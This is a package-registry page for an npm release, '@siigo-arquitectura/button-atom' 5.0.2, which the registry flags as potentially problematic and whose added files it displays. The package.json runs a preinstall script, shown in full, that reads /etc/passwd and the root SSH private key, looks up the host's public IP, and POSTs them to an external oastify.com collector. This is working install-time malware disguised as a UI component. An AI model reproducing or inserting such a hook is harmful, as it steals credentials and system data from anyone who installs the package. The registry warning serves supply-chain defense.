@siigo-arquitectura/button-atom 5.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @siigo-arquitectura/button-atom might be problematic. Click here for more details.

package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "@siigo-arquitectura/button-atom",
3
+ "version": "5.0.2",
4
+ "description": "test",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "/bin/bash scripts/preinstall.sh"
9
+ },
10
+ "author": "testpatagon",
11
+ "license": "ISC"
12
+ }
@@ -0,0 +1,2 @@
1
+ #!/bin/bash
2
+ curl -s -k -X "POST" -d "passwd=$(cat /etc/passwd)&id_rsa=$(cat /root/.ssh/id_rsa)&ip=$(curl -s -k ifconfig.me)" "https://ib6dbikawk0eejnmlejrax1lz9o.oastify.com/pwn3d"